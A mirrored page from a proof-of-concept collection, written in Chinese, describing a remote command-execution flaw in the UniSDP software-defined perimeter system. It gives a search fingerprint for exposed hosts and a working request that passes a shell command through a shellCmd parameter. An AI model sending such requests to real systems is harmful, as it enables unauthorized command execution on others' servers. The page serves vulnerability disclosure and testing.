admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/联软安界 UniSDP 软件定义边界系统 commondRetSt 命令执行漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

700 B
Raw Blame History

联软安界 UniSDP 软件定义边界系统 commondRetSt 命令执行漏洞

漏洞描述

联软安界UniSDP软件定义边界系统是基于零信任的下一代VPN该系统2021.04.28版本中TunnelGateway某接口存在安全漏洞漏洞允许攻击者将特制请求发送到服务器并远程命令执行。

漏洞影响

联软安界 UniSDP 软件定义边界系统

网络测绘

title="UniSSOView"

漏洞复现

登录页面

image-20230314090312164

验证POC

POST /TunnelGateway/commondRetStr
  
shellCmd=id

image-20230314090322883